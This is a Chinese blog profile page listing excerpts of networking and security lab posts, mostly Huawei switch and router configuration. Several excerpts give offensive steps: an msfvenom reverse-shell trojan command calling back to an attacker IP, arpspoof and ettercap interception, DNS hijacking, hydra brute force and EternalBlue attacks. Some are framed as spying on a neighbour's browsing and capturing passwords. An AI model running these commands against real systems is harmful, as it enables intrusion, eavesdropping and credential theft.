自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(53)
  • 收藏
  • 关注

原创 kali linux 下载安装比较好用的命令

下载文件wget,当然还可以通过浏览器下载wget http://repo.mysql.com/mysql-community-release-el7-5.noarch.rpm安装.deb的包dpkg -i Nessus-8.13.1-ubuntu910_amd64.deb 开始安装dpkg -P Nessus-8.13.1-ubuntu910_amd64.deb 卸载软件包安装.sh的包./acunetix_13.0.200217097_x64_.sh 开始安

2020-12-24 22:21:10 26

原创 华为交换机路由器安全加固

我想我是一朵死去的花,不然怎么就盛开不了呢 ---------涩现在的网络架构更注重也安全,无论从设备还是软件方面的能体现出来。只有安全的网络才能保证传输的可靠性,稳定性,安全性,以及隐私性。华为设备加固1,远程管理服务对于使用远程维护,telnet协议采用的是不加密传输,容易导致密码不泄露,设备应采用ssh加密协议,提高网络设备管理安全性。配置步骤1,生成密钥。[Huawei]rsa local-key

2020-12-02 13:09:48 58

原创 ms11_003(漏洞复现)

你我的一样,终将被遗忘 《郭源潮》漏洞简介,ms11-003(windows7IE溢出攻击) 是利用IE8中对css的解析存在一个问题,导致任何访问包含非法css的页面将导致IE8崩溃重启的漏洞。当然ie浏览器还要很多漏洞像ms14_068,但它们利用方式的差不多。在nessud漏洞扫描工具中ms11_003漏洞排分可是10分,最高的一个等级,像ms17_010和cve_2019_0796这些漏洞的没有10分,想必是该漏洞没有什么能阻挡的吧攻击步骤攻击机—

2020-11-20 15:22:46 71 1

原创 ensp(ospf虚链路配置实验)

虚链路----------跨越非骨干区域实现与骨干区域0互连如图(实现全网互通)配置R4配置[Huawei]interface g0/0/0[Huawei-GigabitEthernet0/0/0]ip address 192.168.14.1 24[Huawei]ospf 1 router-id 1.1.1.1 [Huawei-ospf-1]area 0[Huawei-ospf-1-area-0.0.0.0]network 192.168.14.0 0.0.0.255R1配置

2020-11-06 10:09:25 160

原创 ensp(华为ospf特殊区域配置)

OSPF的七种类型LSA:1类LSA ,路由器LSA (router LSA)由区域内所有路由器产生,并且只能在本个区域内泛红广播。这些最基本的LAS通告例出了路由器的所有接口,并指明了他们的状态和沿每条链路方向出站的代价。2类LSA,网络LSA (Network LSA)由区域的DR和BDR路由器产生,报文包括DR和BDR连接的路由器的链路信息,网络LSA也仅仅在产生这条网络的区域内部进行泛洪。3类LSA, 网络汇总LSA (Network summary LSA)由ABR产生,可以通知本区域

2020-11-04 15:19:23 105

原创 ensp(华为ospf基本配置)

ospf简介OSPF(Open Shortest Path First开放式最短路径优先)是一个内部网关协议(Interior Gateway Protocol,简称IGP),用于在单一自治系统(autonomous system,AS)内决策路由。是对链路状态路由协议的一种实现,隶属内部网关协议(IGP),故运作于自治系统内部。著名的迪克斯彻(Dijkstra)算法被用来计算最短路径树。OSPF支持负载均衡和基于服务类型的选路,也支持多种路由形式,如特定主机路由和子网路由等。工作原理OSPF的简单说

2020-11-03 11:30:16 233

原创 ensp(华为VRRP配置)

VRRP的作用VRRP一般指虚拟路由器冗余协议。虚拟路由冗余协议(Virtual Router Redundancy Protocol,简称VRRP)是由IETF提出的解决局域网中配置静态网关出现单点失效现象的路由协议,1998年已推出正式的RFC2338协议标准。VRRP广泛应用在边缘网络中,它的设计目标是支持特定情况下IP数据流量失败转移不会引起混乱,允许主机使用单路由器,以及即使在实际第一跳路由器使用失败的情形下仍能够维护路由器间的连通性。就是两个网关,一个主网关,一个备份网关,主网关down了,

2020-11-02 16:28:18 222

原创 IP地址子网划分公式,简单便捷公式。

当我们对一个网络进行子网划分时,基本上就是将它分成小的网络。比如,当一组IP地址指定给一个公司时,公司可能将该网络“分割成”小的网络,每个部门一个。这样,技术部门和管理部门都可以有属于它们的小网络。通过划分子网,我们可以按照我们的需要将网络分割成小网络。这样也有助于降低流量和隐藏网络的复杂性。优点1.减少网络流量2.提高网络性能3.简化管理4.易于扩大地理范围子网划分公式 可用主机位 子网掩码二进制表达

2020-10-14 15:53:35 44

原创 CVE-2018-8120漏洞复现(提权)

最好用的提权漏洞CVE-2018-8120漏洞描述部分版本Windows系统win32k.sys组件的NtUserSetImeInfoEx()系统服务函数内部未验证内核对象中的空指针对象,普通应用程序可利用该空指针漏洞以内核权限执行任意代码影响版本Windows 7 for 32-bit Systems Service Pack 1Windows 7 for x64-based Systems Service Pack 1Windows Server 2008 for 32-bit System

2020-10-14 09:54:53 124

原创 CVE-2020-0796漏洞复现(蓝屏警告)

CVE-2020-0796简介微软3月11日发布3月例行更新,其中并未公布编号为CVE-2020-0796的高危漏洞资料,但该漏洞却最为引人注目。次日晚(2020年3月12日)微软正式发布CVE-2020-0796高危漏洞补丁。该漏洞的后果十分接近永恒之蓝系列,都利用Windows SMB漏洞远程攻击获取系统最高权限,WannaCry勒索蠕虫就是利用永恒之蓝系列漏洞攻击工具制造的大灾难。除了直接攻击SMB服务端造成RCE外,该漏洞得亮点在于对SMB客户端的攻击,击者可以构造特定的网页,压缩包,

2020-09-20 11:53:55 183

原创 CVE-2019-0708漏洞复现(蓝屏警告)

漏洞介绍:该漏洞是2019年危害最大的严重性漏洞,(无视防火墙),该漏洞是通过Windows,3389远程端口进行攻击的,被攻击的主机会造成蓝屏,也有可能会反弹shell,但是我试过好几次的没有反弹shell,而是直接造成蓝屏。漏洞影响版本:Windows 7 for 32Windows 7 for x64Windows Server 2008 for 32Windows Server 2008 for x64Windows Server 2003 SP2 x86Windows Serv

2020-09-18 15:43:46 286

原创 华为和思科mac地址和IP地址绑定

为什么mac地址和IP地址要绑定?提高局域网安全,防止arp攻击和欺骗计算机都提供了修改IP地址的方法,所以用户可以随意更改自己的IP地址,IP地址的随意修改势必影响其他用户的正常上网,所以推行IP地址和MAC地址绑定,每一个分配的IP地址都要绑定到用户自己的注册的MAC地址上,保证了用户的合法IP不被盗用和滥用,有效地保证了网络的安全和通信质量。绑定的方式有很多种,可以在电脑上绑定,也可以在交换机上绑定思科交换机绑定配置INTERNAL-CORE-1> enable

2020-09-10 11:58:29 108

原创 ensp (华为acl配置)

访问控制列表(ACL)访问控制列表(ACL)是一种基于包过滤的访问控制技术。它可以根据设定的条件对接口上的数据包进行过滤,允许其通过或丢弃。访问控制列表被广泛地应用于路由器和三层交换机。借助于访问控制列表可以有效地控制用户对网络的访问,从而最大程度地保障网络安全。acl作用1,限制网络流量、提高网络性能。例如,ACL可以根据数据包的协议,指定这种类型的数据包具有更高的优先级,同等情况下可预先被网络设备处理。2,提供对通信流量的控制手段。 [3,提供网络访问的基本安全手段。4,在网络设备接口

2020-09-08 20:07:43 542

原创 ensp(华为nat配置)

华为动态NAT和静态nat就不做实验(不节约IP地址)配置华为NAPT公司要求将内部网络10.1.1.0/24转换为一个公网地址200.1.1.10/28上网(访问Server1)配置路由器接口IP等基本配置 在路由器 R1 上配置NAPT acl 2000 rule 5 permit source 10.1.1.0 0.0.0.255 nat address-group 1 200.1.1.10 200.1.1.10 interfac

2020-08-21 11:20:26 265

原创 ensp (dhcp snooping配置实验)

DHCP 安全 防治和保护dhcp shooping 相当于交换机里面形成了一个无形的防火墙如图配置步骤防止仿冒DHCP Server攻击方法**(在交换机上配置)**[Huawei]dhcp enable 交换机上开启DHCP[Huawei]dhcp snooping enable 交换机上开启DHCP snooping[Huawei]vlan 1[Huawei-vlan1]dhcp snooping enable [Huawei]interfa

2020-08-21 10:41:26 211

原创 ensp (dhcp配置实验)

dhcp工作过程(如图)DHCP配置(如图)1,基于全局配置DHCP[Huawei]dhcp enable 开启DHCP[Huawei]ip pool caiwubu 设置地址组名字[Huawei-ip-pool-caiwubu]network 192.168.1.0 mask 24 设置网段,设置掩码[Huawei-ip-pool-caiwubu]gateway-list 192.168.1.254

2020-08-14 11:54:10 56

原创 ensp(华为三层交换机配置)

要求实现,多交换机不同VLAN间通信在三层交换机上配置路由,实现全网互通如图sw1配置[Huawei] vlan 1[Huawei] interface e0/0/1[Huawei-Ethernet0/0/1]port link-ty access [Huawei-Ethernet0/0/1]port default vlan 1[Huawei-Ethernet0/0/1]int g0/0/1[Huawei-GigabitEthernet0/0/1]port link-ty

2020-08-13 13:35:45 332

原创 ensp(华为单臂路由配置小实验)

使用eNSP搭建实验环境,配置单臂路由实现VLAN 10与VLAN 20互通,1,配置交换机[Huawei] vlan batch 10 20[Huawei] int e0/0/1[Huawei-Ethernet0/0/1] port link-type access[Huawei-Ethernet0/0/1] port default vlan 10[Huawei] int e0/0/2[Huawei-Ethernet0/0/2]port link-type access[Huawei

2020-08-13 10:26:29 142

原创 IPV4地址和子网掩码,网关详细介绍

什么是IP地址?IP地址是用来标识网络节点的互联网地址什么是子网掩码?子网掩码用来区分网络位和主机位的地址组成:由32位2进制组成,用10进制标识分为四组,用点隔开。例如: 192.168.1.10IP地址的分类A 1-127 B 128-191C 192-223D 224-239 (组播)E 240-254 (科研)组播和科研在平常中用不到,是国家的IP地址,主要用于研究。...

2020-08-07 16:20:10 231

原创 华为Telnet配置和console配置

Telnet远程,方便设备管理实行跟好的维护,console设置用户和密码跟加安全,配置步骤1,开启Telnet服务[Huawei] Telnet server enable2,配置VTY用户界面的终端dao属性[Huawei] user-interface vty 0 4 [Huawei] protocol inbound telnet 3,console和Telnet启用aaa认证(这样就可以同用户和同密码登录了)[Huawei]user-interface console 0 [

2020-08-06 15:34:09 175

原创 华为ssh配置

ssh采用加密协议,想对于Telnet更加安全跟可靠,而且有等保的时候只能采用ssh,提高设备管理安全性。华为参考配置步骤1,生成本地密钥对rsa local-key-pair createThe key name will be: Auotnavi-callcenter-01_HostThe range of public key size is (512 ~ 2048).NOTES: If the key modulus is greater than 512,It will take

2020-08-06 15:12:22 185

原创 木马入侵windows系统

利用木马植入并打开后门,实现入侵。实验工具:kali linuxwin7msfvenom操作步骤1.通过msfvenom生成木马msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.100.129 lport=6666 -f exe R > /root/shell.exelhost---------本地IP地址lport----------反向连接到主机的端口R--------------木马生成后的路径(此木马没有进

2020-07-29 14:35:50 208

原创 Linux防火墙(firewalld)使用方法,

服务启动操作:启动防火墙[root@localhost ~]# systemctl start firewalld关闭防火墙[root@localhost ~]# systemctl stop firewalld重启防火墙[root@localhost ~]# systemctl restart firewalld查看防火墙状态[root@localhost ~]# systemctl status firewalld防火墙配置命令重载防火墙配置[root@localhost ~]

2020-07-16 13:21:29 269 2

原创 有效防止hydra暴力破解

hydra爆破是出了名的厉害,基本上密码字典强,爆破成功就很高,那么防御方式就是设置本地安全策略防止暴力破解—本地安全策略—账户策略—账户锁定策略—设置阈值(输错密码的次数,设置三次,)设置策略立马生效—需要刷新组策略 gpupdate /force...

2020-07-12 17:03:01 117 1

原创 浅谈TCP/IP模型所对应的协议和工作原理

TCP/IP模型参考;应用层传输层网络层数据链路层物理层模型所对应的协议,应用层:HTTP 80超文本传输协议,提供浏览网页服务Telnet 23远程登录协议,提供远程管理服务FTP 20,21文本传输协议,提供互联网文件资源共享服务SMTP 25简单邮件传输协议,提供互联网电子邮件服务POP3 110邮件协议,提供互联网电子邮件服务TFTP 69(UDP)简单文件传输协议 ,提供简单的文件传输服务,传输层:TCP(传输控制协议)面向连接协议UDP(用户报文协议)面

2020-07-06 13:27:42 279

原创 Linux上tcpdump抓包工具使用

黑客实战小技巧添加链接描述添加链接描述tcpdump是Linux子带的一个抓包工具,常见的用法:root@kali:~# tcpdump -i eth0 -nn 'icmp'root@kali:~# tcpdump -i eth0 -nn 'arp'-i 是网卡名-nn 后面跟的是要抓包的协议``root@kali:~# tcpdump -i eth0 -nn 'dst host 192.168.31.231'抓取192.168.31.231这台主机访问的包,root@ka

2020-07-05 17:38:59 73

原创 系统漏洞入侵之(永恒之蓝),

-----漏洞入侵-----MS17-010 永恒之蓝 --勒索病毒----利用MSF攻击框架----用到meterPeter 渗透工具渗透实验环境 :一台KALI一台win 7----MS17-010利用445端口实行入侵只有防火墙关闭才会成功操作步骤1,扫描主机开放端口情况 nmap -sP 192.168.31.1-255 扫描在线主机 nmap -sS 192.168.31.109 扫描端口开放情况 nmap -O 192.168.

2020-07-02 20:52:27 209

原创 Linux上远程命令

远程Linux:ssh -l root 192.168.0.1-l 用户远程成功了在输密码远程Windows:rdesktop - u tedu -p tedu 192.168.0.10:3389-u 用户-p 密码

2020-07-01 14:48:19 67

原创 内网渗透之dns劫持

DNS欺骗,被攻击的主机访问任意网站的回被转到特定的钓鱼网站,实验工具:kali linux 黑客机win10 肉鸡apache2ettercap操作步骤1,打开kali上的apache2服务,@kali:~# service apache2 startroot@kali:~# service apache2 status绿点就是已经开启了。2,制作网页,钓鱼网页不回做,就随便做了一个,命令如下@kali:~#vim /var/www/html/index.html3,修改

2020-07-01 14:28:20 220

原创 系统漏洞攻击之蓝屏警告

利用系统在带的漏洞实施攻击实验工具1,kali一台2,Windows 2003 一台3,nmap 端口扫描工具4,msfconsole 攻击框架5,ms12-020 系统漏洞实验环境Windows2003,打开高危端口,关闭防火墙。kali进行攻击操作步骤1,扫描端口开放情况nmap -sP 192.168.3.1-255nmap -sS 192.168.3.162,打开攻击框架msfconsole3,msf > search dos //查看KALI漏

2020-06-30 22:05:40 1035 3

原创 内网渗透之抓取隔壁小姐姐上网图片

arp欺骗,利用中间人攻击原理,对内网的用户实施欺骗,从而到达目的。中间人攻击原理:两边通信的要经过黑客才能把信息转发给对方,从而导致信息泄露。实验工具:kali linuxnmaparpspoofdriftnet操作步骤:1,扫描主机nmap -sP 192.168.1.1-255nmap -sS 192.168.1.1-2552,开启IP转发,root@kali:~# echo “1” >> /proc/sys/net/ipv4/ip_forwardroot@

2020-06-30 15:17:45 1492 2

原创 内网渗透之谁动了我的密码,http密码抓获。

通过内网欺骗抓取网站密码实验工具(都是kali自带的)kali Linuxwin10电脑一台arpspoofettercap操作步骤1,开启IP转发root@kali:~# echo 1 >> /proc/sys/net/ipv4/ip_forward查看是否开启,有1就是开启,是0就是没有开启root@kali:~# cat /proc/sys/net/ipv4/ip_forward12,扫描肉鸡(我用自己的win10当肉鸡)root@kali:nmap -sS 19

2020-06-30 14:19:49 114

原创 常用的端口和协议

常见的端口和协议:20-----------ftp发送 , 文件传输协议21-----------ftp接收23----------Telnet53----------dns , 域名解析3389------ rdp , Windows远程端口22----------ssh , Linux远程端口67----------dhcp110---------pop3 , 邮局协议版本3143---------imap

2020-06-29 12:33:04 109

原创 ICMP协议讲解

ICMP协议的作用:用途说明:用来侦测或通知我了设备之间可能发生的各种各样的情况,了解网络设备之间的连接状况,ICMP协议主要用于网络中IP网络发送控制消息,提供可能发生 在通信环境中的各种问题的反馈,ICMP协议的应用:ICMP检测双向通路的连通性ping命令使用ICMP协议常见的ping反馈结果:Reply from 目标地址… //连接成功Destination host unreachable //目标主机不可达Request timed out //请求时间超时

2020-06-28 12:46:10 118

原创 TCP和UDP的应用场景

TCP:当 网络通信质量有要求是,比如整个数据要准确无误的传递给对方,通常要求可靠的应用,比如HTTP,HTTPS,FTP,等文件传输的协议POP、SMTP 等邮件传输的协议,常见使用的 TCP协议应用:有HTTP,FTP, POP,SMTP,Putty,Telnet ,SSH,QQ等文件传输,UDP:当强调传输性而不是传输的 完整性时,要求网络通信速度快,常见的UDP协议应用:QQ语音,QQ视频,等...

2020-06-23 11:47:31 157

原创 TCP和UDP协议讲解,简单通俗,

TCP和UDP的可以实现客服端/服务端的通信区别:TCP面向连接协议,可靠性高,适合传输大量的数据,但需要三次握手,数据补发过程耗时长,通信延迟大,UDP面向非连接协议,可靠性低,适合传输少量数据,但是连接速度快,低耗时,低延迟,...

2020-06-22 23:22:44 183

原创 nmap扫描工具简单使用教程

nmap -------一款强大的扫描工具(kali自带的工具),nmap 扫描类型 :tcp半开扫描tcp全开扫描udp扫描icmp扫描常见的扫描:nmap -sP 192.168.31.0/24 ------扫描该网段的主机nmap -sS 192.168.31.0/24 ------扫描该网段的主机和开放端口nmap -O 192.168.31.36 ------扫描操作系统nmap -sV 192.168.31.36 -----扫描应用程序以及版本nmap -sS -

2020-06-21 13:12:01 75

原创 mysql数据库密码爆破

mysql忘记密码爆破思路:1,停止mariadb服务2,跳过授权启动数据库进程3,重设管理密码4,关闭mysql——safe进程5,启动mariadb服务5,验证新密码步骤:1,停止mariadb服务[root@svr7 ~]# systemctl stop mariadb2,跳过授权启动数据库[root@svr7 ~]# mysqld_safe --skip-grant-tables &[1] 105799[root@svr7]#3,免密进入数据库[root

2020-06-15 20:47:08 423

原创 暴力破解Centos7并登陆实验,

环境准备:1,kali2,centos73,hydra操作步骤:1,扫描网段里的目标主机nmap -sP 192.168.1.1-255 //扫描网段主机nmap -sS 192.168.1.188 //扫描端口开放情况扫描到22端口是开着的,进行下一步操作,2,暴力破解hydra -l root -P 1.1txt 192.168.1.188 ssh-l ------------------------- 指定用户-P --------

2020-06-15 13:24:40 114

原创 内网渗透之断网攻击实验和防御

ARP断网攻击:伪造IP地址和Mac地址实现ARP欺骗导致网络堵塞,攻击工具:kali一台arpspoof攻击步骤1,扫描局域网生存主机nmap -sP 192.168.31.1/242,进行ARP攻击arpspoof -i eth0 -t 192.168.31.175 192.168.31.1-i ------------指定网卡名-t ------------指定IP地址和网关3.对方不能上网,按Ctrl+c停止攻击防御:1.360里面添加下载流量防火墙,自动拦截并

2020-06-14 14:50:11 235

空空如也

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人 TA的粉丝

提示
确定要删除当前文章?
取消 删除